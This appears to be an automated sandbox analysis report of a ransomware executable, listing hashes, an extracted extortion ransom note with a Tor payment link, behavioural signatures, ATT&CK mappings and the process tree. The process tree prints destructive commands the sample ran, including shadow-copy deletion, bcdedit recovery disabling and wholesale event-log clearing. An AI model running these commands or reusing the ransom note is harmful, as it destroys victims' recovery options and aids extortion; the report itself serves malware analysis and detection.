Resubmissions

19-01-2023 10:17

230119-mbpsksff79 10

14-11-2022 04:26

221114-e2qhsseg47 10

20-01-2022 19:02

220120-xptc2abbh7 10

Analysis

  • max time kernel
    207s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2022 04:26

General

  • Target

    c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe

  • Size

    2.9MB

  • MD5

    ccde3fe374a219ed3a85a0bf548542c3

  • SHA1

    c1187fe0eaddee995773d6c66bcb558536e9b62c

  • SHA256

    c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40

  • SHA512

    94852c04d6f627b35a7486de166648eb43373850b862e1958e676c53fd5dc37103659fe28e2b51f2fffd815ded2745d8793d8158543ff14b1e1f0cafe2a3c63c

  • SSDEEP

    49152:4dwE1vCCeShiBHJFIPiEPE3bvk6Ca89388YhwjfJNt/RgaJ2wtb:WwE1253IPiYE3bnCa8Hzj5vwwtb

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Searches\RECOVER-mfqssdj-FILES.txt

Ransom Note
>> What happened? Important files on your network was ENCRYPTED and now they have "mfqssdj" extension. In order to recover your files you need to follow instructions below. >> Sensitive Data Sensitive data on your system was DOWNLOADED. If you DON'T WANT your sensitive data to be PUBLISHED you have to act quickly. Data includes: - Employees personal data, CVs, DL, SSN. - Complete network map including credentials for local and remote services. - Private financial information including: clients data, bills, budgets, annual reports, bank statements. - Manufacturing documents including: datagrams, schemas, drawings in solidworks format. - Source code. -And more... >> CAUTION DO NOT MODIFY ENCRYPTED FILES YOURSELF. DO NOT USE THIRD PARTY SOFTWARE TO RESTORE YOUR DATA. YOU MAY DAMAGE YOUR FILES, IT WILL RESULT IN PERMANENT DATA LOSS. >> What should I do next? Follow these simple steps to get everything back to normal: 1) Download and install Tor Browser from: https://torproject.org/ 2) Navigate to: http://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion/?access-key=cAPELqDsLGJdtvehxxlyhJ5CQfLTSKKFns74YjQWw8fvIQAsq6frqD5lS0BpfvoVGzWMpsUIWeucBxx%2B9aQXvRT29VpQa1fccyBNL3tbjmmLu%2BEatuLhU3NBo8yP6BG63YqpQ4qT%2BUhqJZQxq7iQAnjK8US6q7rWq9LSpaSUZXQRnyQFh7uZHKvSw0K2YpQd2fncQ3BEOTC7nluR0wpowFDYh47FV%2ByccMt6vdK7JgNXAj4DsB5zkE9LDB5tBFp5bVPlhxdp7JxKj9Ct34Epz7T0nIoHAbUMn4efw9SBbC1mCPg3ReiWMh9JANpVY711mSefKfRVokxqiVTXAmycjA%3D%3D
URLs

http://b4twqa2mvob3s6uvuyfra5xk3qgps2v5kkt7k2qnb7rpdu3j4fkntead.onion/?access-key=cAPELqDsLGJdtvehxxlyhJ5CQfLTSKKFns74YjQWw8fvIQAsq6frqD5lS0BpfvoVGzWMpsUIWeucBxx%2B9aQXvRT29VpQa1fccyBNL3tbjmmLu%2BEatuLhU3NBo8yP6BG63YqpQ4qT%2BUhqJZQxq7iQAnjK8US6q7rWq9LSpaSUZXQRnyQFh7uZHKvSw0K2YpQd2fncQ3BEOTC7nluR0wpowFDYh47FV%2ByccMt6vdK7JgNXAj4DsB5zkE9LDB5tBFp5bVPlhxdp7JxKj9Ct34Epz7T0nIoHAbUMn4efw9SBbC1mCPg3ReiWMh9JANpVY711mSefKfRVokxqiVTXAmycjA%3D%3D

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
    C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe --access-token 12345
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3372
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2276
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic csproduct get UUID
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3064
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2L:1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3032
      • C:\Windows\SysWOW64\fsutil.exe
        fsutil behavior set SymlinkEvaluation R2L:1
        3⤵
          PID:2164
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "fsutil behavior set SymlinkEvaluation R2R:1"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2416
        • C:\Windows\SysWOW64\fsutil.exe
          fsutil behavior set SymlinkEvaluation R2R:1
          3⤵
            PID:2220
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "iisreset.exe /stop"
          2⤵
            PID:3556
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3144
            • C:\Windows\SysWOW64\reg.exe
              reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f
              3⤵
                PID:3568
            • C:\Windows\system32\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1692
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                3⤵
                • Interacts with shadow copies
                PID:4552
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "arp -a"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1628
              • C:\Windows\SysWOW64\ARP.EXE
                arp -a
                3⤵
                  PID:5052
              • C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe
                "C:\Users\Admin\AppData\Local\Temp\c3e5d4e62ae4eca2bfca22f8f3c8cbec12757f78107e91e85404611548e06e40.exe" --child --access-token 12345
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:4512
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "wmic csproduct get UUID"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4256
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic csproduct get UUID
                    4⤵
                      PID:3048
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:316
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic.exe Shadowcopy Delete
                    3⤵
                      PID:1444
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "bcdedit /set {default}"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4336
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default}
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1688
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "bcdedit /set {default} recoveryenabled No"
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4768
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled No
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1672
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3636
                    • C:\Windows\system32\cmd.exe
                      cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"
                      3⤵
                        PID:3520
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c "vssadmin.exe Delete Shadows /all /quiet"
                      2⤵
                        PID:2236
                        • C:\Windows\system32\vssadmin.exe
                          vssadmin.exe Delete Shadows /all /quiet
                          3⤵
                          • Interacts with shadow copies
                          PID:4268
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "wmic.exe Shadowcopy Delete"
                        2⤵
                          PID:3740
                          • C:\Windows\System32\Wbem\WMIC.exe
                            wmic.exe Shadowcopy Delete
                            3⤵
                              PID:2316
                          • C:\Windows\system32\cmd.exe
                            "C:\Windows\system32\cmd.exe" /c "cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\""
                            2⤵
                              PID:2040
                              • C:\Windows\system32\cmd.exe
                                cmd.exe /c for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"
                                3⤵
                                  PID:4952
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                              1⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Suspicious use of WriteProcessMemory
                              PID:4792
                            • C:\Windows\system32\vssvc.exe
                              C:\Windows\system32\vssvc.exe
                              1⤵
                                PID:2032
                              • C:\Windows\system32\vssvc.exe
                                C:\Windows\system32\vssvc.exe
                                1⤵
                                  PID:2516

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Defense Evasion

                                File Deletion

                                2
                                T1107

                                Modify Registry

                                1
                                T1112

                                Discovery

                                Query Registry

                                1
                                T1012

                                Peripheral Device Discovery

                                1
                                T1120

                                System Information Discovery

                                1
                                T1082

                                Impact

                                Inhibit System Recovery

                                3
                                T1490

                                Defacement

                                1
                                T1491

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • memory/316-148-0x0000000000000000-mapping.dmp
                                • memory/1444-149-0x0000000000000000-mapping.dmp
                                • memory/1628-142-0x0000000000000000-mapping.dmp
                                • memory/1672-153-0x0000000000000000-mapping.dmp
                                • memory/1688-151-0x0000000000000000-mapping.dmp
                                • memory/1692-140-0x0000000000000000-mapping.dmp
                                • memory/2040-160-0x0000000000000000-mapping.dmp
                                • memory/2164-135-0x0000000000000000-mapping.dmp
                                • memory/2220-137-0x0000000000000000-mapping.dmp
                                • memory/2236-156-0x0000000000000000-mapping.dmp
                                • memory/2276-132-0x0000000000000000-mapping.dmp
                                • memory/2316-159-0x0000000000000000-mapping.dmp
                                • memory/2416-136-0x0000000000000000-mapping.dmp
                                • memory/3032-134-0x0000000000000000-mapping.dmp
                                • memory/3048-147-0x0000000000000000-mapping.dmp
                                • memory/3064-133-0x0000000000000000-mapping.dmp
                                • memory/3144-139-0x0000000000000000-mapping.dmp
                                • memory/3520-155-0x0000000000000000-mapping.dmp
                                • memory/3556-138-0x0000000000000000-mapping.dmp
                                • memory/3568-141-0x0000000000000000-mapping.dmp
                                • memory/3636-154-0x0000000000000000-mapping.dmp
                                • memory/3740-158-0x0000000000000000-mapping.dmp
                                • memory/4256-146-0x0000000000000000-mapping.dmp
                                • memory/4268-157-0x0000000000000000-mapping.dmp
                                • memory/4336-150-0x0000000000000000-mapping.dmp
                                • memory/4512-145-0x0000000000000000-mapping.dmp
                                • memory/4552-144-0x0000000000000000-mapping.dmp
                                • memory/4768-152-0x0000000000000000-mapping.dmp
                                • memory/4952-161-0x0000000000000000-mapping.dmp
                                • memory/5052-143-0x0000000000000000-mapping.dmp